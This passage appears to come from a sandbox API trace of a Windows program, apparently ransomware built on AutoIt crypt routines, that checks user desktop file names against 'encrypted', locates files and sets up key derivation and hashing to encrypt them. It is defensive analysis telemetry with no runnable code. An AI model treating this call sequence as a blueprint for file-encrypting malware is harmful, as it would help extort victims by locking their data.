HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tjNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NI\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iPNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PNmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NmM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mM_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ES0x.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.972] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.972] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.972] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.972] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.972] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.972] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.972] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.972] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.972] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.972] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\5o5iPNmM_ES0x.swf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ccfb10, ftCreationTime.dwHighDateTime=0x1d5bf26, ftLastAccessTime.dwLowDateTime=0xa6e56f60, ftLastAccessTime.dwHighDateTime=0x1d5ba03, ftLastWriteTime.dwLowDateTime=0xa6e56f60, ftLastWriteTime.dwHighDateTime=0x1d5ba03, nFileSizeHigh=0x0, nFileSizeLow=0xc19f, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="5o5iPNmM_ES0x.swf", cAlternateFileName="5O5IPN~1.SWF")) returned 0x7c2100 [0030.972] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.972] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.972] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.972] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.972] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.972] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.973] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.973] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.973] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.973] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.973] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.973] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.973] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.973] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.973] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.973] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.973] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0030.973] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.973] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0030.974] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.974] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.974] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.974] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.974] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.975] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.975] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.975] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.975] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.975] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.975] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.975] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.975] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.975] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.975] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.975] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.975] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.975] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.975] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.975] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.976] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.976] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.976] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.976] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.976] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.976] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.976] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.976] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.976] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, 